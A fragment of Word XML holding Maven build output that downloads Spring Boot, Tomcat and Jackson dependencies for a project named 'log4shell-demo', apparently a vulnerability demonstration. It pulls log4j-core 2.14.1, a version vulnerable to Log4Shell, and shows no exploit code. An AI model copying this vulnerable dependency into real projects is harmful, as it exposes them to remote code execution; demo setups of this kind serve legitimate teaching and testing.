    <w:p w14:paraId="7F9339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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-base/2.12.5/jackson-base-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F570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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-base/2.12.5/jackson-base-2.12.5.pom (9.3 kB at 404 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89889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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B0B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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.pom (6.0 kB at 201 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A37D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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C315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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.pom (5.5 kB at 213 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD4C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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720203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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.pom (2.6 kB at 89 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52474A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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-modules-java8/2.12.5/jackson-modules-java8-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF6F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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-modules-java8/2.12.5/jackson-modules-java8-2.12.5.pom (3.4 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1822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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A510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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.pom (4.9 kB at 140 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D465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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353EE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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.pom (4.4 kB at 175 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3845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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2803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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.pom (3.1 kB at 121 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11705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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F75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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.pom (1.7 kB at 69 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700942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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C8BC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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.pom (1.5 kB at 46 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499AFA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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BDC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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.pom (1.7 kB at 56 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A37B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https://repo.maven.apache.org/maven2/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC29F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https://repo.maven.apache.org/maven2/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.pom (3.0 kB at 123 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C0C5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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2801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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.pom (23 kB at 829 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63297A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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C7F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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1E7D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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421700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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076FF5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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D359F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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar (4.8 kB at 134 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B806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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB986B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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar (4.8 kB at 73 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E722D7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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47FCC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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar (4.8 kB at 71 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB985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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01501B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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar (42 kB at 399 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BAA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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFA66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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar (292 kB at 2.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FAF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https://repo.maven.apache.org/maven2/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DE6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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar (18 kB at 125 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A0E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https://repo.maven.apache.org/maven2/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842419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https://repo.maven.apache.org/maven2/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar (4.6 kB at 29 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DAED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https://repo.maven.apache.org/maven2/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C822C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https://repo.maven.apache.org/maven2/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar (25 kB at 141 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB9F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https://repo.maven.apache.org/maven2/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BDA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https://repo.maven.apache.org/maven2/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar (24 kB at 122 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D537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https://repo.maven.apache.org/maven2/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC473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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar (472 kB at 2.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E848F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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9218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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar (4.7 kB at 19 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B4FA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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09C0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https://repo.maven.apache.org/maven2/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar (327 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601ED6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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar (1.4 MB at 4.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B40F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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2297081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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171EFA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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar (1.6 MB at 4.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80DD6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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB9C0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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar (76 kB at 218 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EE9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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F0C29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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar (34 kB at 99 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00670F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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC5A2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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar (120 kB at 312 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA8F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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ECEE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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar (366 kB at 945 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834172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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169CB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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar (9.4 kB at 24 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB7E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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CA4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https://repo.maven.apache.org/maven2/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar (1.5 MB at 3.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B8C2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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216DC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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar (4.8 kB at 11 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020EC3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https://repo.maven.apache.org/maven2/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77882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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar (1.5 MB at 3.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AFAC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https://repo.maven.apache.org/maven2/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05680B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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar (256 kB at 509 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387BBA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https://repo.maven.apache.org/maven2/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093718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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar (277 kB at 551 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1A6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https://repo.maven.apache.org/maven2/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51860C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https://repo.maven.apache.org/maven2/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar (382 kB at 626 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8936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https://repo.maven.apache.org/maven2/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442BA40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https://repo.maven.apache.org/maven2/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar (697 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59411A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https://repo.maven.apache.org/maven2/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB3E8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https://repo.maven.apache.org/maven2/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar (1.6 MB at 2.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A2B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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0A1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https://repo.maven.apache.org/maven2/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar (1.0 MB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE00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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6085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https://repo.maven.apache.org/maven2/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar (288 kB at 377 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1C63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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar (300 kB at 367 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E66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https://repo.maven.apache.org/maven2/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar (3.4 MB at 4.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9B3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https://repo.maven.apache.org/maven2/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar (1.3 MB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC67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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar (1.7 MB at 2.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12CF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29F2C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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FC1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632981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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.pom (2.3 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E88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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.0/maven-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279C0B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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.0/maven-3.0.pom (22 kB at 995 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BD54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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/15/maven-parent-15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B23A1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/15/maven-parent-15.pom (24 kB at 889 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C80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https://repo.maven.apache.org/maven2/org/apache/apache/6/apache-6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F009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https://repo.maven.apache.org/maven2/org/apache/apache/6/apache-6.pom (13 kB at 556 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715AC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358174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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.pom (3.9 kB at 162 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F25B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737E2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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.pom (3.3 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF31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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.6/plexus-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A267F7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.6/plexus-2.0.6.pom (17 kB at 645 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F47A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02E5D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.0/maven-artifact-3.0.pom (1.9 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0938DF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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D0A23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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.pom (5.4 kB at 268 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB61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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-plexus/1.4.2/guice-plexus-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA30B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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-plexus/1.4.2/guice-plexus-1.4.2.pom (3.1 kB at 149 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402AB9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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-bean/1.4.2/guice-bean-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A0D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https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-bean/1.4.2/guice-bean-1.4.2.pom (2.6 kB at 118 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6247B39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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject/1.4.2/sisu-inject-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C260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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject/1.4.2/sisu-inject-1.4.2.pom (1.2 kB at 66 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECDB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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-parent/1.4.2/sisu-parent-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD774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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-parent/1.4.2/sisu-parent-1.4.2.pom (7.8 kB at 370 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C56D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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/6/forge-parent-6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BA8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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/6/forge-parent-6.pom (11 kB at 512 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E89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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9C8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.pom (770 B at 35 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE626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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.7.1/plexus-containers-1.7.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167ED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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.7.1/plexus-containers-1.7.1.pom (5.0 kB at 240 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AE1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A6F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom (22 kB at 741 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572A8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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC977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https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom (14 kB at 678 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0CA7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FD4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.pom (4.0 kB at 182 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45F3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A157E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.pom (3.3 kB at 133 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B664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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534C1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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.pom (5.5 kB at 237 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8F42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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA56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https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7.pom (11 kB at 553 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9D5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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D93479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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.pom (5.6 kB at 235 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E4F4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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/30/maven-shared-components-30.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A47ED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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/30/maven-shared-components-30.pom (4.6 kB at 208 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A381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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/30/maven-parent-30.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC2B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/30/maven-parent-30.pom (41 kB at 1.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1DD27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https://repo.maven.apache.org/maven2/org/apache/apache/18/apache-18.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F7E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https://repo.maven.apache.org/maven2/org/apache/apache/18/apache-18.pom (16 kB at 712 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38CD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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BE9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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.pom (13 kB at 475 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DC6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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/39/commons-parent-39.pom</w:t>
      </w:r>
    </w:p>
